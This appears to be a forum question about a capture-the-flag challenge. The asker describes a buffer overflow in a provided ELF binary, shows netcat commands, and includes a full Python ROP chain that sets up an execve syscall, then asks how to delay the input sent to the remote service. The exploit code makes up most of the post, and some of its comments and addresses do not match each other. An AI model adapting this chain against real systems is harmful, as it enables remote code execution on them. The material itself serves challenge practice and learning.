# Remote Code Execution Exploitation: Delaying Binary Input to a Web Application

Tags: python, security, networking, netcat

I'm getting into penetration testing/vulnerability exploitation, and have been working on a reverse-engineering challenge recently. For the challenge, there is a remote application that I connect to via port 2888 (I'm using netcat with the following command):

```
nc xxx.xxx.x.xx 2888
```

Then, I receive a prompt asking me to enter input, which is then "encrypted" and given back to me.

The challenge provides an ELF binary which it claims mirrors functionality of the Internet-connection version. I spent a lot of time analyzing that binary, and have found a classic buffer overflow vulnerability. I'm pretty sure the server has ASLR and DEP enabled, so I have used return-oriented programming to develop a ROP chain that will allow me to execute a command. (I'll post this at the bottom of the question)

All I have to do to win the challenge is execute the following command:

```
/bin/flag myemail123@gmail.com
```

Then, the server should send me the flag. I've configured my ROP chain to launch an execve command with the above command within.

For testing purposes, I ran the binary in a VM, then piped my ROP chain (generated with python) into port 2888 on the VM.

```
python ./ropchain.py | nc localipaddress 2888
```

I changed the command to /bin/echo to see if I was getting the exploit right, and sure enough it echoes my email address. Also, when I strace the local binary, execve has all the inputs I expect.

However, when I try to pipe my ROP chain like I did above into the live server, it writes the input into stdin before the application is ready for it, and the exploit doesn't work. (I don't get an email). I've analyzed my two commands with Wireshark and I'm getting a FIN/ACK packet when I shouldn't be when connecting to the live server.

My question is, how can I write the packed addresses and such that make up my ROP chain into the remote application, but wait until it is ready for input? Am I going about this the right way?

I will include my ROP chain as well for reference. Thank you!!

Below is the ROP chain. In case you're wondering why some of the addresses are off, it is because the program takes the input and shifts all ASCI characters by 13 spaces.

```
#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack
import sys

p = lambda x : pack('Q', x)

IMAGE_BASE_0 = 0x0000000000400000 # ./reverse
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

#padding
rop = 'N' * 24

rop += rebase_0(0x00000000000010fb) # 0x00000000004010fb: pop r13; ret; 
rop += '///////b'
rop += rebase_0(0x0000000000000f90) # 0x0000000000400f90: pop rdi; ret; 
rop += rebase_0(0x000000000037c160) # data section: 0x00000000006ac160
rop += rebase_0(0x0000000000105e0a) # 0x0000000000435e0a: mov qword ptr [rdi], r13; xor eax, eax; pop r12; pop r13; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)

rop += rebase_0(0x00000000000010fb) # 0x00000000004010fb: pop r13; ret; 
rop += 'in/flag\0'
rop += rebase_0(0x0000000000000f90) # 0x0000000000400f90: pop rdi; ret; 
rop += rebase_0(0x000000000037c175) # data section: 0x00000000002ac168
rop += rebase_0(0x0000000000105e0a) # 0x0000000000435e0a: mov qword ptr [rdi], r13; xor eax, eax; pop r12; pop r13; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)

rop += rebase_0(0x000000000000ec77) # 0x000000000040ec6a: pop rax; ret; 
rop += 'example@'
rop += rebase_0(0x000000000000106a) # 0x0000000000401077: pop rsi; ret;
rop += rebase_0(0x000000000037c163) # data section: 0x00000000006ac170
rop += rebase_0(0x000000000012c111) # 0x000000000045c111: mov qword ptr [rsi], rax; ret;

rop += rebase_0(0x000000000000ec77) # 0x000000000040ec6a: pop rax; ret;  
rop += 'yahooooo'
rop += rebase_0(0x000000000000106a) # 0x0000000000401077: pop rsi; ret; 
rop += rebase_0(0x000000000037c16B) # data section: 0x00000000006ac178
rop += rebase_0(0x000000000012c111) # 0x000000000045c111: mov qword ptr [rsi], rax; ret;

rop += rebase_0(0x000000000000ec77) # 0x000000000040ec6a: pop rax; ret;  
rop += '.com\0\0\0\0'
rop += rebase_0(0x000000000000106a) # 0x0000000000401077: pop rsi; ret; 
rop += rebase_0(0x000000000037c180) # data section: 0x00000000006ac180
rop += rebase_0(0x000000000012c111) # 0x000000000045c111: mov qword ptr [rsi], rax; ret;

#Put a pointer to the command /bin/echo into the rdi register
rop += rebase_0(0x0000000000000f90) # 0x0000000000400f90: pop rdi; ret; 
rop += rebase_0(0x000000000037c160) # data section: 0x00000000002ac160

#Write the email string to the data section
rop += rebase_0(0x000000000000ec77) # 0x000000000040ec6a: pop rax; ret;  
rop += rebase_0(0x000000000037c163) # data section: 0x00000000006ac170
rop += rebase_0(0x000000000000106a) # 0x0000000000401077: pop rsi; ret;
rop += rebase_0(0x000000000037c190) # data section: 0x00000000006ac190
rop += rebase_0(0x000000000012c111) # 0x000000000045c111: mov qword ptr [rsi], rax; ret;

#Write NULL bytes to the data section
rop += rebase_0(0x000000000000ec77) # 0x000000000040ec6a: pop rax; ret;  
rop += p(0x0000000000000000)        # NULL
rop += rebase_0(0x000000000000106a) # 0x0000000000401077: pop rsi; ret;
rop += rebase_0(0x000000000037c198) # data section: 0x00000000006ac198
rop += rebase_0(0x000000000012c111) # 0x000000000045c111: mov qword ptr [rsi], rax; ret;

#Write ///////b  to the data section
rop += rebase_0(0x000000000000ec77) # 0x000000000040ec6a: pop rax; ret;  
rop += rebase_0(0x000000000037c160) # data section: 0x00000000006ac160
rop += rebase_0(0x000000000000106a) # 0x0000000000401077: pop rsi; ret;
rop += rebase_0(0x000000000037c188) # data section: 0x00000000006ac188
rop += rebase_0(0x000000000012c111) # 0x000000000045c111: mov qword ptr [rsi], rax; ret;

#Set the rdx register to NULL
rop += rebase_0(0x00000000000ea948) # 0x000000000041a955: pop rdx; ret;
rop += p(0x0000000000000000) 

#Set the rax register to the value for execve()
rop += rebase_0(0x000000000000ec77) # 0x000000000040ec6a: pop rax; ret; 
rop += p(0x000000000000003b)

#Make the syscall
rop += rebase_0(0x00000000001234e5) # 0x00000000004534e5: syscall; ret;
rop += '\x90' * 400
print rop
```